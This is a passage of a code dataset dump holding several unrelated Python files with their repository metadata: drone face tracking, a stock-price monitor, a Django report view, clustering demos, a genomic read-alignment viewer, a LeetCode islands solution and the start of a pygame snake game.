cv2.cvtColor(frm, cv2.COLOR_BGR2GRAY)\n facesDetected = faceCascade.detectMultiScale(imgGray, 1.2, 4)\n facesCenter = []\n facesArea = []\n\n for (x, y, w, h) in facesDetected:\n cv2.rectangle(frm, (x, y), (x + w, y + h), (0, 128, 0), 3)\n facesCenter.append([x + w // 2, y + h // 2])\n facesArea.append(w * h)\n\n if len(facesArea) != 0:\n i = facesArea.index(max(facesArea))\n return frm, [facesCenter[i], facesArea[i]]\n else:\n return frm, [[0, 0], 0]\n\ndef dataDisplay(img, error_x, error_y, spd_x, spd_y, PID):\n '''Take the positional, speed and pid data and display it on video frame'''\n cv2.putText(img, f'PID SETTINGS: Kp:{PID[0]} Ki: {PID[1]} Kd: {PID[2]} ',\n (30,30), cv2.FONT_HERSHEY_SIMPLEX, 0.7,(0,0,255),2)\n cv2.putText(img, f'X ERROR: {error_x} X SPEED: {spd_x}',\n (30,60), cv2.FONT_HERSHEY_SIMPLEX, 0.7,(0,255,0), 2)\n cv2.putText(img, f'Y ERROR: {error_y} Y SPEED: {spd_y}',\n (30,90), cv2.FONT_HERSHEY_SIMPLEX, 0.7,(0,255,0),2)\n return img\n\n\ndef trackingFace(dronik, result, w, h, PID, pError_x, pError_y, frm):\n '''\n\n :param dronik: instance of Tello Object\n :param info: 0 for face not found\n :param w: width\n :param pid: pid controller parameters\n :param dist: distance from where we want to be and where we are camerawise\n :return: the instructions for drone movement\n '''\n\n #Calculate the velocities based on error values and PID\n error_x = result[0][0] - w // 2\n spd_x = PID[0] * error_x + PID[1] * (error_x - pError_x)\n spd_x = np.clip(spd_x, -100, 100)\n\n error_y = h//2 - result[0][1]\n spd_y = PID[0] * error_y + PID[1] * (error_y - pError_y)\n spd_y = np.clip(spd_y, -100, 100)\n spd_x, spd_y = int(spd_x), int(spd_y)\n\n #Display the data on the frame\n frm = dataDisplay(frm, error_x, error_y, spd_x, spd_y, PID)\n\n\n #print(f'X SPD: {spd_x}, Y SPD: {spd_y}')\n\n #Send the values to the tello flight control\n if result[0][0] != 0 or result[0][1] != 0:\n dronik.yaw_velocity = int(spd_x)\n dronik.up_down_velocity = int(spd_y)\n else:\n dronik.for_back_velocity = 0\n dronik.left_right_velocity = 0\n dronik.up_down_velocity = 0\n dronik.yaw_velocity = 0\n error_x = 0\n error_y = 0\n\n if dronik.send_rc_control:\n dronik.send_rc_control(dronik.left_right_velocity,dronik.for_back_velocity, dronik.up_down_velocity,\n dronik.yaw_velocity)\n\n\n return error_x, error_y, frm\n", "repo_name": "rskrobotics/face-tracking-drone", "sub_path": "AuxillaryFunctions.py", "file_name": "AuxillaryFunctions.py", "file_ext": "py", "file_size_in_byte": 3834, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "djitellopy.Tello", "line_number": 13, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 41, "usage_type": "call"}, {"api_name": "cv2.CascadeClassifier", "line_number": 51, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 52, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 52, "usage_type": "attribute"}, {"api_name": "cv2.rectangle", "line_number": 58, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 70, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 71, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 72, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 73, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 74, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 75, "usage_type": "attribute"}, 
{"api_name": "numpy.clip", "line_number": 93, "usage_type": "call"}, {"api_name": "numpy.clip", "line_number": 97, "usage_type": "call"}]} +{"seq_id": "30939235382", "text": "import math\nimport sys\n\nfrom app import create_app\nfrom flask_socketio import SocketIO\nfrom flask_script import Manager,Shell\nfrom dependency.util import Server\nfrom app.realtimemonitor.scan_zdt import get_zg_code\nimport tushare as ts\n\nasync_mode = \"threading\"\n\napp = create_app('default')\n\n# 打开调试功能\n# manager.add_command('runserver',Server(use_debugger=True))\nsocketio = SocketIO(app, async_mode=async_mode)\nsocketio.init_app(app, cors_allowed_origins='*')\n\n@socketio.on('start_monitor',namespace='/test')\ndef test_message():\n print('receive')\n # print(message)\n # 定时任务\n zg_code_dict = get_zg_code()\n code_list = list(zg_code_dict.keys())\n conn=ts.get_apis()\n\n each_batch = math.ceil(len(code_list)/5)\n # 分批 3批\n while 1:\n\n for i in range(5):\n code_list_=code_list[i*each_batch:each_batch*(i+1)]\n\n try:\n df = ts.quotes(code_list_,conn=conn)\n except Exception as e:\n socketio.sleep(10)\n continue\n\n df=df[['code','price','last_close']]\n df['percent']=df.apply(lambda row:round((row['price']-row['last_close'])/row['last_close']*100,2),axis=1)\n df=df[(df['percent']>8) | (df['percent']<-8)]\n df=df.sort_values(by='percent')\n df['name']=df['code'].map(lambda x:zg_code_dict.get(x))\n\n if len(df)>0:\n result=df.to_dict(orient='records')\n print('send---')\n # print(result)\n # for item in result:\n\n socketio.emit('start_response', {'data':result,'num':i+1},namespace=\"/test\")\n\n # socketio.sleep(60)\n\n\n@socketio.on('stop_monitor',namespace='/test')\ndef test_message():\n print('receive')\n # print(message)\n socketio.emit('stop_response',{'data':'nihao'} ,namespace=\"/test\")\n\nmanager = Manager(app)\n\n\ndef make_shell_context():\n return dict(app=app)\n\nmanager.add_command('shell',Shell(make_context=make_shell_context))\nserver=Server()\nserver.get_socket(socketio)\nmanager.add_command(\"runserver\", server)\n\nif __name__=='__main__':\n # socketio.run(app)\n manager.run()\n", "repo_name": "Rockyzsu/StockManagement", "sub_path": "manage.py", "file_name": "manage.py", "file_ext": "py", "file_size_in_byte": 2162, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 8, "dataset": "github-code", "pt": "53", "api": [{"api_name": "app.create_app", "line_number": 13, "usage_type": "call"}, {"api_name": "flask_socketio.SocketIO", "line_number": 17, "usage_type": "call"}, {"api_name": "app.realtimemonitor.scan_zdt.get_zg_code", "line_number": 25, "usage_type": "call"}, {"api_name": "tushare.get_apis", "line_number": 27, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 29, "usage_type": "call"}, {"api_name": "tushare.quotes", "line_number": 37, "usage_type": "call"}, {"api_name": "flask_script.Manager", "line_number": 65, "usage_type": "call"}, {"api_name": "flask_script.Shell", "line_number": 71, "usage_type": "call"}, {"api_name": "dependency.util.Server", "line_number": 72, "usage_type": "call"}]} +{"seq_id": "20557123959", "text": "from django.contrib.auth.models import User\nfrom django.db.models import Count\nfrom django.db.models.functions import TruncMonth, TruncYear\n\nfrom reports.views.base_report_template import BaseReportTemplateView\n\n\nclass UserRegistrationsView(BaseReportTemplateView):\n\n template_name = 'reports/user_registrations.html'\n\n def get_graph_data(self, start_date, end_date):\n\n user_registrations = User.objects\\\n 
.filter(date_joined__gte=start_date, date_joined__lte=end_date) \\\n .exclude(pk__in=self.users_filter_by) \\\n .annotate(month=TruncMonth('date_joined'),\n year=TruncYear('date_joined')) \\\n .values('month', 'year') \\\n .annotate(count=Count('id')) \\\n .order_by('year', 'month')\n\n previous_user_registrations = User.objects.filter(date_joined__lt=start_date).count()\n\n return {\n 'user_registrations': user_registrations,\n 'previous_user_registrations': previous_user_registrations\n }\n", "repo_name": "DigitalCampus/django-oppia", "sub_path": "reports/views/user_registrations.py", "file_name": "user_registrations.py", "file_ext": "py", "file_size_in_byte": 1027, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 17, "dataset": "github-code", "pt": "53", "api": [{"api_name": "reports.views.base_report_template.BaseReportTemplateView", "line_number": 8, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.User.objects.filter", "line_number": 14, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 14, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 14, "usage_type": "name"}, {"api_name": "django.db.models.functions.TruncMonth", "line_number": 17, "usage_type": "call"}, {"api_name": "django.db.models.functions.TruncYear", "line_number": 18, "usage_type": "call"}, {"api_name": "django.db.models.Count", "line_number": 20, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects.filter", "line_number": 23, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 23, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 23, "usage_type": "name"}]} +{"seq_id": "4568030205", "text": "import matplotlib.pyplot as plt\nfrom sklearn import datasets\nimport numpy as np\n\n#Toy data sets\ncenters_neat = [(-10, 10), (0, -5), (10, 5)]\nx_neat, _ = datasets.make_blobs(n_samples=5000, \n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tcenters=centers_neat,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tcluster_std=2,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\trandom_state=2)\n\nx_messy, _ = datasets.make_classification(n_samples=5000,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tn_features=10,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tn_classes=3,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tn_clusters_per_class=1,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tclass_sep=1.5,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tshuffle=False,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\trandom_state=301)\n#Default plot params\nplt.style.use('seaborn')\ncmap = 'tab10'\n\n# plt.figure(figsize=(17,8))\n# plt.subplot(121, title='\"Neat\" Clusters')\n# plt.scatter(x_neat[:,0], x_neat[:,1])\n# plt.subplot(122, title='\"Messy\" Clusters')\n# plt.scatter(x_messy[:,0], x_messy[:,1])\n# plt.show()\n\n# \nfrom sklearn.cluster import KMeans\n\n#Predict K-Means cluster membership\nkm_neat = KMeans(n_clusters=3, random_state=2).fit_predict(x_neat)\nkm_messy = KMeans(n_clusters=3, random_state=2).fit_predict(x_messy)\n\n# plt.figure(figsize=(15,8))\n# plt.subplot(121, title='\"Neat\" K-Means')\n# plt.scatter(x_neat[:,0], x_neat[:,1], c=km_neat, cmap=cmap)\n# plt.subplot(122, title='\"Messy\" K-Means')\n# plt.scatter(x_messy[:,0], x_messy[:,1], c=km_messy, cmap=cmap)\n# plt.show()\n\n\nfrom sklearn.mixture import GaussianMixture\n\n#Predict GMM cluster membership\ngm_messy = GaussianMixture(n_components=3).fit(x_messy).predict(x_messy)\n\n# plt.figure(figsize=(15,8))\n# 
plt.subplot(121, title='\"Messy\" K-Means')\n# plt.scatter(x_messy[:,0], x_messy[:,1], c=km_messy, cmap=cmap)\n# plt.subplot(122, title='\"Messy\" GMM')\n# plt.scatter(x_messy[:,0], x_messy[:,1], c=gm_messy, cmap=cmap)\n# plt.show()\n\nimport hdbscan\n\n\n #Toy data set\nblob1, y1 = datasets.make_blobs(n_samples=25, \n centers=[(10,5)],\n cluster_std=1.5,\n random_state=2)\n\nblob2, y2 = datasets.make_blobs(n_samples=500, \n centers=[(6,2)],\n cluster_std=1.3,\n random_state=2)\n\nblob3, y3 = datasets.make_blobs(n_samples=500, \n centers=[(2,5)],\n cluster_std=1,\n random_state=2)\n\nunbal = np.vstack([blob1, blob2, blob3])\ny1[y1 == 0] = 0\ny2[y2 == 0] = 1\ny3[y3 == 0] = 2\nlabs = np.concatenate([y1, y2, y3])\n\n#Predict K-Means cluster membership\nkm_unbal = KMeans(n_clusters=3, random_state=2).fit(unbal)\nkm_unbal_preds = KMeans(n_clusters=3, random_state=2).fit_predict(unbal)\n\nplt.figure(figsize=(15,8))\nplt.subplot(121, title='Generated Clusters and Assignments')\nplt.scatter(unbal[:,0], unbal[:,1], c=labs, cmap=cmap)\nplt.subplot(122, title='K-Means w/ Cluster Assignments and Centers')\nplt.scatter(unbal[:,0], unbal[:,1], c=km_unbal_preds, cmap=cmap)\nplt.scatter(km_unbal.cluster_centers_[:,0], km_unbal.cluster_centers_[:,1], marker='X', s=150, c='black')\n\n\n\n\nclust_count = np.linspace(1, 20, num=20, dtype='int')\n\nclust_number = 2\nplot_number = 1\nplt.figure (figsize=(17,12))\nwhile clust_number < 21:\n hdb = hdbscan.HDBSCAN(min_cluster_size=clust_number)\n hdb_pred = hdb.fit(unbal)\n plt.subplot(5, 4, plot_number, title = 'Min. Cluster Size = {}'.format(clust_number))\n plt.scatter(unbal[:,0], unbal[:,1], c=hdb_pred.labels_, cmap=cmap)\n plot_number += 1\n clust_number += 1\n \nplt.tight_layout()\nplt.show()", "repo_name": "AghilasSini/AT-Annotator", "sub_path": "features_extractions/when_kmean_fail.py", "file_name": "when_kmean_fail.py", "file_ext": "py", "file_size_in_byte": 3488, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sklearn.datasets.make_blobs", "line_number": 7, "usage_type": "call"}, {"api_name": "sklearn.datasets", "line_number": 7, "usage_type": "name"}, {"api_name": "sklearn.datasets.make_classification", "line_number": 12, "usage_type": "call"}, {"api_name": "sklearn.datasets", "line_number": 12, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.style.use", "line_number": 20, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.style", "line_number": 20, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 20, "usage_type": "name"}, {"api_name": "sklearn.cluster.KMeans", "line_number": 34, "usage_type": "call"}, {"api_name": "sklearn.cluster.KMeans", "line_number": 35, "usage_type": "call"}, {"api_name": "sklearn.mixture.GaussianMixture", "line_number": 48, "usage_type": "call"}, {"api_name": "sklearn.datasets.make_blobs", "line_number": 61, "usage_type": "call"}, {"api_name": "sklearn.datasets", "line_number": 61, "usage_type": "name"}, {"api_name": "sklearn.datasets.make_blobs", "line_number": 66, "usage_type": "call"}, {"api_name": "sklearn.datasets", "line_number": 66, "usage_type": "name"}, {"api_name": "sklearn.datasets.make_blobs", "line_number": 71, "usage_type": "call"}, {"api_name": "sklearn.datasets", "line_number": 71, "usage_type": "name"}, {"api_name": "numpy.vstack", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 80, "usage_type": "call"}, {"api_name": "sklearn.cluster.KMeans", 
"line_number": 83, "usage_type": "call"}, {"api_name": "sklearn.cluster.KMeans", "line_number": 84, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 86, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 86, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 87, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 87, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 88, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 88, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 89, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 89, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 90, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 90, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 91, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 91, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 96, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 100, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 100, "usage_type": "name"}, {"api_name": "hdbscan.HDBSCAN", "line_number": 102, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 104, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 104, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 105, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 105, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 109, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 109, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 110, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 110, "usage_type": "name"}]} +{"seq_id": "31492605997", "text": "from Bio import SeqIO\r\nfrom Bio import Seq\r\nimport pysam\r\nfrom colorama import Fore, Style\r\n\r\nbam_input_file = '../test_data/3e25dd86-256f-4b4a-bd54-8d8e83d47e37_gdc_realn_rehead.Aligned.sortedByCoord.out.bam'\r\n\r\nfasta_input_file = '../fasta/Homo_sapiens_L1.L1HS.fa'\r\n\r\nfasta_sequences = SeqIO.parse(open(fasta_input_file),'fasta')\r\n\r\nl1_seq = None\r\n\r\nfor fasta in fasta_sequences:\r\n l1_seq = str(fasta.seq)\r\n\r\nsamfile = pysam.AlignmentFile(bam_input_file, \"rb\")\r\n\r\n# ┌┐└┘├┤┬┴┼─│\r\n\r\ndef print_grid(grid, reference):\r\n totals = [x['A'] + x['C'] + x['G'] + x['T'] for x in grid]\r\n grid = [\r\n {\r\n 'A': x['A']/totals[i],\r\n 'C': x['C']/totals[i],\r\n 'G': x['G']/totals[i],\r\n 'T': x['T']/totals[i]\r\n } for i, x in enumerate(grid)]\r\n # print('┌───────────┬' + '─────┬'*len(reference[:-1]) + '─────┐')\r\n # print('│ Reference │' + '│'.join([' {} '.format(x) for x in reference]) + '│')\r\n # print('├───────────┼' + '─────┼'*len(reference[:-1]) + '─────┤')\r\n # print('│ A │' + '│'.join(['{:>4.0%} '.format(x['A']) for x in grid]) + '│')\r\n # print('├───────────┼' + '─────┼'*len(reference[:-1]) + '─────┤')\r\n # print('│ C │' + '│'.join(['{:>4.0%} '.format(x['C']) for x in grid]) + '│')\r\n # print('├───────────┼' + '─────┼'*len(reference[:-1]) + '─────┤')\r\n # print('│ G │' + '│'.join(['{:>4.0%} '.format(x['G']) for x in grid]) + '│')\r\n # print('├───────────┼' + '─────┼'*len(reference[:-1]) + '─────┤')\r\n # 
print('│ T │' + '│'.join(['{:>4.0%} '.format(x['T']) for x in grid]) + '│')\r\n # print('└───────────┴' + '─────┴'*len(reference[:-1]) + '─────┘')\r\n tmp_string = ''\r\n tmp_string += '┌───────────┬' + '─────┬'*len(reference[:-1]) + '─────┐\\n'\r\n tmp_string += '│ Reference │' + '│'.join([' {} '.format(x) for x in reference]) + '│\\n'\r\n tmp_string += '├───────────┼' + '─────┼'*len(reference[:-1]) + '─────┤\\n'\r\n tmp_string += '│ A │' + '│'.join(['{:>4.0%} '.format(x['A']) for x in grid]) + '│\\n'\r\n tmp_string += '├───────────┼' + '─────┼'*len(reference[:-1]) + '─────┤\\n'\r\n tmp_string += '│ C │' + '│'.join(['{:>4.0%} '.format(x['C']) for x in grid]) + '│\\n'\r\n tmp_string += '├───────────┼' + '─────┼'*len(reference[:-1]) + '─────┤\\n'\r\n tmp_string += '│ G │' + '│'.join(['{:>4.0%} '.format(x['G']) for x in grid]) + '│\\n'\r\n tmp_string += '├───────────┼' + '─────┼'*len(reference[:-1]) + '─────┤\\n'\r\n tmp_string += '│ T │' + '│'.join(['{:>4.0%} '.format(x['T']) for x in grid]) + '│\\n'\r\n tmp_string += '└───────────┴' + '─────┴'*len(reference[:-1]) + '─────┘\\n'\r\n return tmp_string\r\n\r\ndef compare_reads(start_pos, seqlength):\r\n start_pos -= 1\r\n bam_reads = []\r\n samfile.reset()\r\n grid = [{'A': 0, 'C': 0, 'G': 0, 'T': 0} for x in range(seqlength)]\r\n print('grid len {}'.format(len(grid)))\r\n print('seq len {}'.format(seqlength))\r\n matched_reads = 0\r\n other_reads = 0\r\n counter = 0\r\n mismatch_seq = []\r\n for read in samfile.fetch():\r\n\r\n start_offset = start_pos - 1\r\n ref_s = read.reference_start - read.query_alignment_start\r\n ref_e = ref_s + read.query_length\r\n\r\n if start_offset - 50 < ref_s <= start_offset + seqlength:\r\n counter += 1\r\n read_str = ''\r\n cigar = read.cigartuples\r\n start = read.reference_start - start_offset\r\n seq = read.query_sequence\r\n if cigar[0][0] == 4:\r\n start -= cigar[0][1]\r\n index = 0\r\n len_so_far = 0\r\n\r\n ref_seq = l1_seq[start_pos:start_pos + seqlength].upper()\r\n r_match = ref_seq[:max(start_pos, ref_s) - start_pos] + seq[max(start_pos, ref_s) - ref_s:start_pos + seqlength - ref_s] + ref_seq[len(ref_seq) - (start_pos + seqlength - min(start_pos + seqlength, ref_e)):]\r\n # print(\r\n # 'seq :',\r\n # '.'*(max(start_pos, ref_s) - start_pos) + \\\r\n # seq[max(start_pos, ref_s) - ref_s:start_pos + seqlength - ref_s] + \\\r\n # '.'*(start_pos + seqlength - min(start_pos + seqlength, ref_e))\r\n # ,\r\n # max(start_pos, ref_s) - start_pos,\r\n # start_pos + seqlength - min(start_pos + seqlength, ref_e)\r\n # )\r\n if r_match != ref_seq:\r\n mismatch_seq.append(Seq.translate(r_match))\r\n other_reads += 1\r\n else:\r\n matched_reads += 1\r\n print(mismatch_seq)\r\n # for seq in mismatch_seq:\r\n # print(Seq.translate(seq))\r\n print('Total: {}; Matched: {}; Mismatched: {}'.format(counter, matched_reads, other_reads))\r\n print('-'*100)\r\n\r\n\r\n\r\ndef print_reads(start_pos, seqlength):\r\n bam_reads = []\r\n samfile.reset()\r\n grid = [{'A': 0, 'C': 0, 'G': 0, 'T': 0} for x in range(seqlength)]\r\n print('grid len {}'.format(len(grid)))\r\n print('seq len {}'.format(seqlength))\r\n for read in samfile.fetch():\r\n start_offset = start_pos - 1\r\n\r\n if start_offset - 50 < read.reference_start <= start_offset + seqlength:\r\n read_str = ''\r\n cigar = read.cigartuples\r\n start = read.reference_start - start_offset\r\n seq = read.seq\r\n if cigar[0][0] == 4:\r\n start -= cigar[0][1]\r\n index = 0\r\n len_so_far = 0\r\n for type, length in cigar:\r\n if type == 0:\r\n for c_idx in range(length):\r\n 
if start_offset <= len_so_far + c_idx + read.reference_start < start_offset + seqlength:\r\n try:\r\n grid[len_so_far + c_idx + read.reference_start - start_offset][seq[c_idx].upper()] += 1\r\n except:\r\n print('error {}'.format(len_so_far + c_idx + read.reference_start - start_offset))\r\n print('grid_len {}'.format(len(grid)))\r\n\r\n # grid[index] += 1\r\n # index += 1\r\n read_str += Fore.GREEN\r\n elif type == 1:\r\n read_str += Fore.BLUE\r\n elif type == 2:\r\n read_str += Fore.MAGENTA\r\n seq = '-'*length + seq\r\n print(cigar)\r\n elif type == 3:\r\n read_str += Fore.YELLOW\r\n elif type == 4:\r\n read_str += Fore.RED\r\n elif type == 5:\r\n read_str += Fore.WHITE\r\n elif type == 6:\r\n read_str += Fore.WHITE\r\n elif type == 7:\r\n read_str += Fore.WHITE\r\n elif type == 8:\r\n read_str += Fore.WHITE\r\n read_str += seq[0:length]\r\n seq = seq[length:]\r\n len_so_far += length\r\n\r\n read_str += Fore.WHITE\r\n bam_reads.append((start, read_str))\r\n # return print_grid(grid, l1_seq[start_offset:start_offset + seqlength].upper())\r\n# samfile.close()\r\n # bam_reads.sort(key=lambda x: x[0])\r\n print('\\n\\n\\n\\n\\n')\r\n for read in bam_reads:\r\n print('.'*(50+read[0]) + '{}'.format(read[1]))\r\n print(Style.RESET_ALL + '-'*120)\r\n print('-'*0 + '{}'.format(Fore.WHITE + l1_seq[start_offset - 50: start_offset] + Fore.GREEN + l1_seq[start_offset:start_offset + seqlength].upper() + Fore.WHITE + l1_seq[start_offset+seqlength:start_offset+seqlength + 20]))\r\n\r\n\r\n# M\tBAM_CMATCH\t0\r\n# I\tBAM_CINS\t1\r\n# D\tBAM_CDEL\t2\r\n# N\tBAM_CREF_SKIP\t3\r\n# S\tBAM_CSOFT_CLIP\t4\r\n# H\tBAM_CHARD_CLIP\t5\r\n# P\tBAM_CPAD\t6\r\n# =\tBAM_CEQUAL\t7\r\n# X\tBAM_CDIFF\t8\r\n# B\tBAM_CBACK\t9\r\n\r\n\r\nif __name__ in \"__main__\":\r\n print_reads(2621, 20)\r\n", "repo_name": "MarkGrivainis/2018_xuya_peptides", "sub_path": "scripts/alignment_test.py", "file_name": "alignment_test.py", "file_ext": "py", "file_size_in_byte": 8610, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "Bio.SeqIO.parse", "line_number": 10, "usage_type": "call"}, {"api_name": "Bio.SeqIO", "line_number": 10, "usage_type": "name"}, {"api_name": "pysam.AlignmentFile", "line_number": 17, "usage_type": "call"}, {"api_name": "Bio.Seq.translate", "line_number": 95, "usage_type": "call"}, {"api_name": "Bio.Seq", "line_number": 95, "usage_type": "name"}, {"api_name": "colorama.Fore.GREEN", "line_number": 137, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 137, "usage_type": "name"}, {"api_name": "colorama.Fore.BLUE", "line_number": 139, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 139, "usage_type": "name"}, {"api_name": "colorama.Fore.MAGENTA", "line_number": 141, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 141, "usage_type": "name"}, {"api_name": "colorama.Fore.YELLOW", "line_number": 145, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 145, "usage_type": "name"}, {"api_name": "colorama.Fore.RED", "line_number": 147, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 147, "usage_type": "name"}, {"api_name": "colorama.Fore.WHITE", "line_number": 149, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 149, "usage_type": "name"}, {"api_name": "colorama.Fore.WHITE", "line_number": 151, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 151, "usage_type": "name"}, {"api_name": 
"colorama.Fore.WHITE", "line_number": 153, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 153, "usage_type": "name"}, {"api_name": "colorama.Fore.WHITE", "line_number": 155, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 155, "usage_type": "name"}, {"api_name": "colorama.Fore.WHITE", "line_number": 160, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 160, "usage_type": "name"}, {"api_name": "colorama.Style.RESET_ALL", "line_number": 168, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 168, "usage_type": "name"}, {"api_name": "colorama.Fore.WHITE", "line_number": 169, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 169, "usage_type": "name"}, {"api_name": "colorama.Fore.GREEN", "line_number": 169, "usage_type": "attribute"}]} +{"seq_id": "35448334494", "text": "# -*- coding: utf-8 -*-\n\"\"\"\n200. 岛屿数量\n给你一个由 '1'(陆地)和 '0'(水)组成的的二维网格,请你计算网格中岛屿的数量。\n\n岛屿总是被水包围,并且每座岛屿只能由水平方向或竖直方向上相邻的陆地连接形成。\n\n此外,你可以假设该网格的四条边均被水包围。\n\n\n\n示例 1:\n\n输入:\n[\n['1','1','1','1','0'],\n['1','1','0','1','0'],\n['1','1','0','0','0'],\n['0','0','0','0','0']\n]\n输出: 1\n示例 2:\n\n输入:\n[\n['1','1','0','0','0'],\n['1','1','0','0','0'],\n['0','0','1','0','0'],\n['0','0','0','1','1']\n]\n输出: 3\n解释: 每座岛屿只能由水平和/或竖直方向上相邻的陆地连接而成。\n\"\"\"\nimport collections\nfrom typing import List\n\n\nclass Solution:\n def numIslands(self, grid: List[List[str]]) -> int:\n \"\"\"\n 广度优先搜索\n 时间复杂度:O(MN),其中 M 和 N 分别为行数和列数。\n\n 空间复杂度:O(min(M,N)),在最坏情况下,整个网格均为陆地,队列的大小可以达到 min(M,N)。\n :param grid:\n :return:\n \"\"\"\n nr = len(grid)\n if nr == 0:\n return 0\n nc = len(grid[0])\n\n num_islands = 0\n for r in range(nr):\n for c in range(nc):\n if grid[r][c] == \"1\":\n num_islands += 1\n grid[r][c] = \"0\"\n neighbors = collections.deque([(r, c)])\n while neighbors:\n row, col = neighbors.popleft()\n for x, y in [(row - 1, col), (row + 1, col), (row, col - 1), (row, col + 1)]:\n if 0 <= x < nr and 0 <= y < nc and grid[x][y] == \"1\":\n neighbors.append((x, y))\n grid[x][y] = \"0\"\n\n return num_islands\n\n\nif __name__ == '__main__':\n grid = [\n ['1', '1', '0', '0', '0'],\n ['1', '1', '0', '0', '0'],\n ['0', '0', '1', '0', '0'],\n ['0', '0', '0', '1', '1']\n ]\n\n solution = Solution()\n print(solution.numIslands(grid))\n", "repo_name": "MaoningGuan/LeetCode", "sub_path": "软件开发岗刷题(华为笔试准备)/队列和栈/numIslands_2.py", "file_name": "numIslands_2.py", "file_ext": "py", "file_size_in_byte": 2104, "program_lang": "python", "lang": "zh", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "53", "api": [{"api_name": "typing.List", "line_number": 39, "usage_type": "name"}, {"api_name": "collections.deque", "line_number": 59, "usage_type": "call"}]} +{"seq_id": "74834099049", "text": "import pygame as pg\nfrom random import randrange\n\n# Variables Globales\nWINDOW = 500\nTILE_SIZE = 25\nRANGE = (TILE_SIZE // 2, WINDOW - TILE_SIZE // 2, TILE_SIZE)\nget_random_position = lambda: [randrange(*RANGE), randrange(*RANGE)]# funcion para obtener una posicion aleatoria\nsnake = pg.rect.Rect([0, 0, TILE_SIZE - 2, TILE_SIZE - 2])# INSTANCIA DE LA CLASE RECT sera la cabeza de la serpiente\nsnake.center = get_random_position()\nlength = 1\nsnake_body_segments = [snake.copy()]\nsnake_direction = (0, 0)\ntime, time_steps = 0, 110 #time es el 